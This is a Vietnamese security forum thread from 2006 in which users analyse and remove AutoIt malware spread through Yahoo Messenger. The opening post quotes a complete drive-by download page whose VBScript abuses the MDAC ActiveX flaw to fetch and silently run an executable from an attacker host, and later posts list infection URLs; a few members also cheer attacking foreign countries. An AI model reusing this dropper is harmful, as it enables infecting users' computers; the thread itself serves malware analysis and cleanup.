[Question] Lại thêm 1 thằng này mới điên |
14/09/2006 00:00:43 (+0700) | #1 | 23065 |
khomph
Member
|
0 |
|
|
Joined: 01/08/2006 19:56:06
Messages: 18
Offline
|
|
Sáng vừa log vào YM lại thấy ngay thằng này, các bác xem hộ em nó là biến thể nào, gây hậu quả gì, em mới đang đi từ Basic nên chưa dám băm bổ nó ra.
<html>
<head>
<title>
..:: Welcome ::..
</title>
<script language="VBScript">
on error resume next
dl = "http://viet8x.evonet.ro/task.exe"
Set df = document.createElement("object")
df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
str="Microsoft.XMLHTTP"
Set x = df.CreateObject(str,"")
a1="Ado"
a2="db."
a3="Str"
a4="eam"
str1=a1&a2&a3&a4
str5=str1
set S = df.createobject(str5,"")
S.type = 1
str6="GET"
x.Open str6, dl, False
x.Send
fname1="bl4ck.com"
set F = df.createobject("Scripting.FileSystemObject","")
set tmp = F.GetSpecialFolder(2)
fname1= F.BuildPath(tmp,fname1)
S.open
S.write x.responseBody
S.savetofile fname1,2
S.close
set Q = df.createobject("Shell.Application","")
Q.ShellExecute fname1,"","","open",0
</script>
</head>
<body bgcolor="lavender">
<br><br><br>
<center>
<h3>You're welcome</h3>
</center>
</body>
</html> |
|
|
|
|
[Question] Lại thêm 1 thằng này mới điên |
14/09/2006 00:46:00 (+0700) | #2 | 23084 |
mfeng
Researcher
|
Joined: 29/10/2004 15:16:29
Messages: 243
Offline
|
|
h**p://viet8x.evonet.ro/task.exe:
Code:
PS: Do code có tính chất phá hoại nên HVA remove.
Thangdiablo |
|
|
|
|
[Question] Re: Lại thêm 1 thằng này mới điên |
14/09/2006 01:08:33 (+0700) | #3 | 23092 |
letstart
Member
|
0 |
|
|
Joined: 03/07/2006 02:43:42
Messages: 8
Offline
|
|
Em thấy thằng này sử dụng lại mã khai thác lỗi MDAC của window đây mà
http://www.milw0rm.com/exploits/2052 |
|
|
|
|
[Question] Re: Lại thêm 1 thằng này mới điên |
14/09/2006 04:05:20 (+0700) | #4 | 23125 |
eiseis
Member
|
0 |
|
|
Joined: 29/06/2006 00:00:12
Messages: 3
Offline
|
|
To light.phoenix.
cho tớ hỏi là cậu dịch file task.exe sang .txt bằng CT gì thế |
|
|
|
|
[Question] Lại thêm 1 thằng này mới điên |
14/09/2006 06:34:05 (+0700) | #5 | 23160 |
mfeng
Researcher
|
Joined: 29/10/2004 15:16:29
Messages: 243
Offline
|
|
@eiseis:
Tớ dùng OllyDbg. |
|
|
|
|
[Question] Lại thêm 1 thằng này mới điên |
14/09/2006 08:12:03 (+0700) | #6 | 23176 |
kaisai
Member
|
0 |
|
|
Joined: 08/07/2006 23:13:44
Messages: 8
Offline
|
|
Ừm cứ cài Kaspersky là xong.Vừa vào hxxp://viet8x.evonet.ro hay minhnhut.be,và những trang trước nũa là Kaspersky thông báo trang này có đoạn mã độc hại và khoá ngay link này,từ khi loại virut lam bằng AutoIT này xuất hiện em chua bị phát nào,đúng là Kaspersky khá tốt cần gì cập nhật BKAV!Thế mà cứ làm um sùm lên,dân ta mất cảnh giác quá. |
|
|
|
|
[Question] Lại thêm 1 thằng này mới điên |
14/09/2006 08:53:14 (+0700) | #7 | 23182 |
tinhtho_online
Member
|
0 |
|
|
Joined: 03/02/2005 10:36:18
Messages: 7
Offline
|
|
kaisai wrote:
Ừm cứ cài Kaspersky là xong.Vừa vào hxxp://viet8x.evonet.ro hay minhnhut.be,và những trang trước nũa là Kaspersky thông báo trang này có đoạn mã độc hại và khoá ngay link này,từ khi loại virut lam bằng AutoIT này xuất hiện em chua bị phát nào,đúng là Kaspersky khá tốt cần gì cập nhật BKAV!Thế mà cứ làm um sùm lên,dân ta mất cảnh giác quá.
hxxp://viet8x.evonet.ro <== cái này dạo này phát tán qua YIM dữ lắm anh em chú ý nó. Coi chừng bi luột á |
|
|
|
|
[Question] Lại thêm 1 thằng này mới điên |
14/09/2006 09:46:46 (+0700) | #8 | 23189 |
|
jamesmr
Member
|
0 |
|
|
Joined: 03/03/2006 06:30:26
Messages: 153
Offline
|
|
adware từ trang này hxxp://viet8x.evonet.ro nó copy nguyên source code của daokhuc.be chỉ sửa lại chút đỉnh,chắc có "gà" nào bắt chước đây -)) .
kaisai wrote:
Kaspersky thông báo trang này có đoạn mã độc hại và khoá ngay link này,từ khi loại virut lam bằng AutoIT này xuất hiện em chua bị phát nào,đúng là Kaspersky khá tốt cần gì cập nhật BKAV!Thế mà cứ làm um sùm lên,dân ta mất cảnh giác quá.
Vì mấy tay phát tán mấy con này còn "gà" quá nên mơi bị AV nó tóm đấy.
( |
|
|
|
|
[Question] Re: Lại thêm 1 thằng này mới điên |
14/09/2006 13:16:41 (+0700) | #9 | 23244 |
eiseis
Member
|
0 |
|
|
Joined: 29/06/2006 00:00:12
Messages: 3
Offline
|
|
@ light.phoenix,
cậu dùng CT Olly dịch ra code như thế, cậu có thể chỉ cho tớ sơ qua cách cậu đã làm không, tớ cũng có biết sơ qua về Olly rồi. thanks |
|
|
|
|
[Question] Lại thêm 1 thằng này mới điên |
14/09/2006 19:45:02 (+0700) | #10 | 23273 |
|
hoangtu_saint
Member
|
0 |
|
|
Joined: 11/07/2006 08:20:53
Messages: 13
Location: Saint-Petersburg
Offline
|
|
tôi chỉ xin nói 1 câu rằng: nếu ai có ý định phá hoại thì cũng đừng làm ảnh hưởng đến vietnam tất cả,mình là người vietnam thì phải đi phá các nước khác chứ đừng phá nước mình,phá các nước khác để họ biết đến vietnam.PHẢI CÓ TINH THẦN DÂN TỘC!!!!!!!!! |
|
|
|
|
[Question] Lại thêm 1 thằng này mới điên |
14/09/2006 22:03:12 (+0700) | #11 | 23308 |
|
ducnamnv
Member
|
0 |
|
|
Joined: 22/09/2003 15:29:11
Messages: 55
Location: Đâu đó
Offline
|
|
hoangtu_saint wrote:
tôi chỉ xin nói 1 câu rằng: nếu ai có ý định phá hoại thì cũng đừng làm ảnh hưởng đến vietnam tất cả,mình là người vietnam thì phải đi phá các nước khác chứ đừng phá nước mình,phá các nước khác để họ biết đến vietnam.PHẢI CÓ TINH THẦN DÂN TỘC!!!!!!!!!
Hoan nghênh ý kiến này. PHẢI CÓ TINH THẦN DÂN TỘC CHỨ ! Các bác cứ việc viết VR, cứ việc hack, cứ thoải mái crack nhưng nên phá của bọn nước ngoài cho anh em được nhờ. cho bọn nó biết thế nào là Việt Nam chứ quanh quẩn mấy cái của VN thì làm ăn gì. |
|
Fan of LeVuHoang, conmale |
|
|
|
[Question] Lại thêm 1 thằng này mới điên |
14/09/2006 22:18:30 (+0700) | #12 | 23313 |
|
conmale
Administrator
|
Joined: 07/05/2004 23:43:15
Messages: 9353
Location: down under
Offline
|
|
hoangtu_saint wrote:
tôi chỉ xin nói 1 câu rằng: nếu ai có ý định phá hoại thì cũng đừng làm ảnh hưởng đến vietnam tất cả,mình là người vietnam thì phải đi phá các nước khác chứ đừng phá nước mình,phá các nước khác để họ biết đến vietnam.PHẢI CÓ TINH THẦN DÂN TỘC!!!!!!!!!
Không phá ai cả. Muốn phá thì tự phá trên máy của mình. |
|
What bringing us together is stronger than what pulling us apart. |
|
|
|
[Question] Lại thêm 1 thằng này mới điên |
14/09/2006 22:27:02 (+0700) | #13 | 23315 |
|
phamquoc_truong
Elite Member
|
0 |
|
|
Joined: 04/04/2004 07:54:12
Messages: 79
Location: PeaceWorld
Offline
|
|
mình là người vietnam thì phải đi phá các nước khác chứ đừng phá nước mình
Hic hic . . . truyền thống giao lưu hữu hảo với bạn bè trên thế giời từ xưa đến nay bị ông đè một phát bẹp như con tép.
Hoan nghênh ý kiến này
Hờ hờ . . . lại có người còn ủng hộ nữa này . . .
Những virus loại như thế này chỉ thể hiện một điều là sự kém hiểu biết, thích adua. Đầu thì rỗng nhưng muốn nhiều người biết đến . . .
Ai còn gặp những con virus loại như thế này, hãy vào đây :
http://www.bkav.com.vn/frmThugopy.aspx
Đưa link virus, link html và nhớ để lại email
Việc này không phải chỉ là giúp BKAV cập nhật virus mà còn đưa website chứa virus và black list, chuyển sang cho C14(C phòng chống tội phạm công nghệ cao). Thế nào cũng có vài chú ngu mặt ra. |
|
|
|
|
[Question] Re: Lại thêm 1 thằng này mới điên |
14/09/2006 23:22:40 (+0700) | #14 | 23332 |
mfeng
Researcher
|
Joined: 29/10/2004 15:16:29
Messages: 243
Offline
|
|
Mới thêm một biến thể từ h**p://vuichoivn.com
[Mô tả]
- Ngay khi vào site trên, file guitangban.exe sẽ được thực thi. Đây là một virus viết bằng autoit, có các chức năng sau:
+ Gửi tin nhắn hàng loạt qua YIM, nội dung là một msg ngẫu nhiên trong số:
- Moi lam website nay, moi nguoi cho y kien
- Nghe nhac Audition da^y
- Nghe nhac Viet Nam mien phi, moi lam hom qua
- Dem nay mua ngoai hien, mua oi dung roi them cho xot xa. Anh khong quay ve day, loi nao anh noi da quen...
- Ngay mai thoi doi ta lia xa em con nho? That long anh muon ta nhin thay nhau, cho quen mau cau yeu thuong em voi anh hom nao...
- Tra lai em niem vui khi duoc gan ben em, tra lai em loi yeu thuong em dem, tra lai em niem tin thang nam qua ta dap xay. Gio day chi la nhung ky niem buon...
- Loi em noi cho tinh chung ta, nhu doan cuoi trong cuon phim buon. Nguoi da den nhu la giac mo roi ra di cho anh bat ngo...
- Tha nguoi dung noi se yeu minh toi mai thoi thi gio day toi se vui hon. Gio nguoi lac loi buoc chan ve noi xa xoi, cay dang chi rieng minh toi...
- Khoc cho nho thuong voi trong long, khoc cho noi sau nhe nhu khong. Bao nhieu yeu thuong nhung ngay qua da tan theo khoi may bay that xa...
- Toi di lang thang lan trong bong toi buot gia, ve dau khi da mat em roi? Ve dau khi bao nhieu mo mong gio da vo tan... Ve dau toi biet di ve dau?
Kèm thêm link tới h**p://vuichoivn.com
- Đặt các value trong registry:
lQ đã remove code phá hoại.
- Download file guitangban1.exe về, ghi ra file taskmng.exe đặt trong %WINDOWS% : Đây là một trojan
[Một số thông tin ngoài lề]
Code:
; <AUT2EXE VERSION: 3.2.0.1>
; ----------------------------------------------------------------------------
; <AUT2EXE INCLUDE-START: D:\Documents and Settings\Le Quang Trung\Desktop\guitangban.au3>
; ----------------------------------------------------------------------------
; <AUT2EXE VERSION: 3.2.0.1>
; ----------------------------------------------------------------------------
; <AUT2EXE INCLUDE-START: D:\AutoIT\Projects\Adware\DKC.au3>
; ----------------------------------------------------------------------------
;--------------------------------------------
; Tac Gia: Kevin Duong - KVD
; Phan Mem: DKC Bot
; Phien Ban: 1.1
; Cong Dung: Quang cao Website thong qua Y!M
; Phat Hanh: 1-9-2006
;--------------------------------------------
->Code này được lấy từ code gốc của KVD
- "Tác giả" của vuichoivn.com là Le Quang Trung |
|
|
|
|
[Question] Re: Lại thêm 1 thằng này mới điên |
15/09/2006 00:08:55 (+0700) | #15 | 23355 |
|
ducnamnv
Member
|
0 |
|
|
Joined: 22/09/2003 15:29:11
Messages: 55
Location: Đâu đó
Offline
|
|
[Mô tả]
- Ngay khi vào site trên, file guitangban.exe sẽ được thực thi. Đây là một virus viết bằng autoit, có các chức năng sau:
- Đặt các value trong registry:
lQ đã remove code phá hoại.
Đề nghị các anh ban quản trị diễn đàn để lại mấy cái đoạn mà VR nó ghi vào registry lại chứ xoá hết đi thì bọn em làm sao mà biết nó ghi gì vào registry mà xoá.Xoá gì thì xoá nhưng đừng xoá mấy đoạn đó chứ, bọn em k biết dịch ngược mã để tìm code nó là gì mà xoá đâu. Bạn em nhiều người k dùng BKAV nên k biết nó ghi gì vào registry thế thì làm sao mà gỡ nó đi đc.
Một chút ngu ý xin các bác quan tâm. Thanks ! |
|
Fan of LeVuHoang, conmale |
|
|
|
[Question] Lại thêm 1 thằng này mới điên |
15/09/2006 00:20:00 (+0700) | #16 | 23359 |
|
jamesmr
Member
|
0 |
|
|
Joined: 03/03/2006 06:30:26
Messages: 153
Offline
|
|
phamquoc_truong wrote:
Những virus loại như thế này chỉ thể hiện một điều là sự kém hiểu biết, thích adua. Đầu thì rỗng nhưng muốn nhiều người biết đến . . .
Sao bác này nói chính xác quá,toàn là bọn loi choi ,bắt bọn này phạt vài nhát là lại kêu lên em hối hận quá à...nhưng em thích nhất là được cánh nhà báo đưa lên trang bìa cơ,chán như con gián. -)) |
|
|
|
|
[Question] Re: Lại thêm 1 thằng này mới điên |
15/09/2006 03:18:53 (+0700) | #17 | 23415 |
|
ducnamnv
Member
|
0 |
|
|
Joined: 22/09/2003 15:29:11
Messages: 55
Location: Đâu đó
Offline
|
|
Lại thêm 1 chú mới xuất hiện, đúng là công cụ tốt vào tay người xấu = đại phá hoại.
Code:
HOT HOT HOT !!! Toan nhung girl xinh cua cac truong PTTH !!! hxxp://www.traoluumoi.com/YMBEST/
Các bác cao thủ xin chỉ giúp cho anh em phương pháp chung để khử cái bọn này đi với, khó chịu quá. Làm ơn chỉ cho em biết làm cách nào để biết con VR đó nó ghi những gì vào registry... đừng bảo em là đọc mã ASM nhé, em chịu ( |
|
Fan of LeVuHoang, conmale |
|
|
|
[Question] Lại thêm 1 thằng này mới điên |
15/09/2006 03:22:41 (+0700) | #18 | 23416 |
mfeng
Researcher
|
Joined: 29/10/2004 15:16:29
Messages: 243
Offline
|
|
Hướng dẫn remove virus trên vuichoivn.com:
1. Kill process guitangban.exe (file virus chính).
2. Kill process taskmng.exe (trojan)
2. Xoá file taskmng.exe trong %Windows%
3. Chạy file script để khắc phục các sửa đổi registry do virus gây ra: http://www.bkav.com.vn/download/fix_reg.vbs.
(Do virus này sửa đổi regisstry tương tự các biến thể trước đó, nên fix_reg của bkav vẫn sử dụng được.)
Với virus trên traoluumoi.com/YMBEST/:
Msg của virus này là:
Code:
HOT HOT HOT !!! Toan nhung girl xinh cua cac truong PTTH !!! ...
1. Kill process YMBEST.exe
2. Xoá file YMBEST.exe trong %Windows%
3. Fix reg tương tự như trên.
Chú ý:
1. IE chưa fix lỗi MS06-014 sẽ bị nhiễm virus ngay khi vào các website chứa virus trên. Download bản fix MS06-014 tại http://www.microsoft.com/technet/security/Bulletin/MS06-014.mspx
2. Người dùng firefox không bị ảnh hưởng. |
|
|
|
|
[Question] Re: Lại thêm 1 thằng này mới điên |
15/09/2006 03:42:35 (+0700) | #19 | 23421 |
hth_vn
Member
|
0 |
|
|
Joined: 14/01/2006 02:33:21
Messages: 12
Offline
|
|
Toi cung bi dinh thang nay roi. Nhung toi da diet duoc no roi hu hon.
lQ:
- Yêu cầu đánh TV.
- Cảnh cáo lần thứ 1. |
|
|
|
|
[Question] Re: Lại thêm 1 thằng này mới điên |
15/09/2006 22:45:03 (+0700) | #20 | 23565 |
|
ducnamnv
Member
|
0 |
|
|
Joined: 22/09/2003 15:29:11
Messages: 55
Location: Đâu đó
Offline
|
|
Đọc code mấy con AutoIt mới thấy các đồng chí sài lại chẳng có chút sáng tạo nào cả, vẫn bài bản như cũ, k có gì tiến bộ, sáng tạo. chỉ có đồng chí nghĩ ra gaixinh và đồng chí cải biển random cái mess là có sáng tạo thôi. Hy vọng mấy chú đú đởn đừng viết mấy con như thế này nữa mà làm mất công trả lời của các bác ligh.phoenix, ......
Tuy nhiên, cũng phải cảm ơn các bác, nhờ vụ này mà em biết AutoIt nó hay đến thế, mở mắt được nhiều thứ.Hỳ hục tìm kiếm, thử nghiệm cuối cùng cũng khôn ra.
Các bác sao không dùng chính autoit để viết chương trình diệt VR trên Y!M đi nhỉ :? . Công cụ này viết cái đó cũng dễ mà. |
|
Fan of LeVuHoang, conmale |
|
|
|
[Question] Re: Lại thêm 1 thằng này mới điên |
16/09/2006 04:51:50 (+0700) | #21 | 23630 |
Harvestmoon
Member
|
0 |
|
|
Joined: 07/05/2004 17:14:54
Messages: 18
Offline
|
|
ducnamnv wrote:
Đọc code mấy con AutoIt mới thấy các đồng chí sài lại chẳng có chút sáng tạo nào cả, vẫn bài bản như cũ, k có gì tiến bộ, sáng tạo. chỉ có đồng chí nghĩ ra gaixinh và đồng chí cải biển random cái mess là có sáng tạo thôi. Hy vọng mấy chú đú đởn đừng viết mấy con như thế này nữa mà làm mất công trả lời của các bác ligh.phoenix, ......
Đúng rồi, nếu muốn nổi tiếng thì tham gia vào virus writer contest chứ đừng có copy / paste như thế phiền toái lắm |
|
|
|
|
[Question] Lại thêm 1 thằng này mới điên |
16/09/2006 05:38:59 (+0700) | #22 | 23636 |
night_hero
Member
|
0 |
|
|
Joined: 12/09/2006 17:52:44
Messages: 2
Offline
|
|
em dow quá trời cái web anh light đưa mà sao chưa xoá được cái VR hxxp://www.traoluumoi.com/YMBEST/ vậy chỉ em với huhu |
|
|
|
|
[Question] Lại thêm 1 thằng này mới điên |
16/09/2006 06:21:40 (+0700) | #23 | 23642 |
night_hero
Member
|
0 |
|
|
Joined: 12/09/2006 17:52:44
Messages: 2
Offline
|
|
rồi rồi em hiểu rồi ...tại em nood hì hì giet được rồi cám ơn nhiều......... |
|
|
|
|
[Question] Lại thêm 1 thằng này mới điên |
16/09/2006 09:56:09 (+0700) | #24 | 23673 |
sptit_145
Member
|
0 |
|
|
Joined: 16/08/2003 02:07:00
Messages: 13
Offline
|
|
Nhức đầu quá, toàn mấy thằng nhóc phá hoại chẳng được cái tích sự gì cả, hom nay nguyên 1 đám bạn trong list YM của tôi nhiễm, mở YM ra nhận được 1 đống spam mesage nhìn chong mặt, mở ra view code thấy y chang như gái xinh chẳng có gì hay ho cả |
|
|
|
|
[Question] Lại thêm 1 thằng này mới điên |
16/09/2006 12:40:40 (+0700) | #25 | 23693 |
|
tmd
Member
|
0 |
|
|
Joined: 28/06/2006 03:39:48
Messages: 2951
Offline
|
|
Nói chung cứ thủ sẳn 1 user trong nhóm administrator của MS windows, 1 cái soft có chức năng tựa tựa ice sword, rồi ngồi mà mò registry.. |
|
3 giai đoạn của con... người, ban đầu dek biết gì thì phải thăm dò, sau đó biết rồi thì phải thân thiết, sau cùng khi quá thân thiết rồi thì phải tình thương mến thương. Nhưng mà không thương được thì ... |
|
|
|
[Question] Re: Lại thêm 1 thằng này mới điên |
16/09/2006 13:02:47 (+0700) | #26 | 23700 |
|
havythoai
HVA Friend
|
Joined: 05/04/2004 22:59:39
Messages: 562
Offline
|
|
Bây giờ, chắc ăn đừng có click vô những link "lạ lạ", nếu ko thì ăn 1 ổ virus luôn đó :lol
hic, với những tin nhắn thế này, người ko kinh nghiệm sẽ click vô, nên sức lây lan của nó nhanh quá -))
"Cac ban co the tranh bi nhiem cac loai virus online gan day bang cach update Windows . Vao day de biet cach Update Win ma ko can ban quyen Windows xin: http://www.geocities.co.jp/ie_protector "
"Let's vote for Miss Vietnam - Mai Phuong Thuy - for the upcoming Miss World championship : http://www.geocities.co.jp/thanatos18388 !! " ,, tin nhắn này tôi nhận nhiều nhất từ nick của các bạn thân,... vote đi, vote rồi ăn virus luôn :lol :lol |
|
|
|
|
[Question] Re: Lại thêm 1 thằng này mới điên |
16/09/2006 21:26:09 (+0700) | #27 | 23733 |
|
kara_men
Member
|
0 |
|
|
Joined: 27/06/2006 02:32:38
Messages: 91
Offline
|
|
Bác post link thì cũng nên sửa nó đi chút cho người khác khỏi "lỡ tay" he he.... bấm vào phát thấy Kaspersky la lối om xòm
|
|
|
[Question] Lại thêm 1 thằng này mới điên |
16/09/2006 21:29:01 (+0700) | #28 | 23734 |
kaisai
Member
|
0 |
|
|
Joined: 08/07/2006 23:13:44
Messages: 8
Offline
|
|
Đây là thông báo của KAV sau khi vào link http://stb.tsukuba-ac.jp/tranquocthang/
mà vào bằng FireFox đàng hoàng nha.Ai dám bảo FireFox không bị dính nào, may có KAV.
Code:
Kaspersky Anti-Virus 6.0
The requested URL http://stb.tsukuba-ac.jp/tranquocthang/activex.html is infected with Exploit.JS.ADODB.Stream.e virus
Lại thêm 1 AutoIT híc loạn mất rồi
|
|
|
|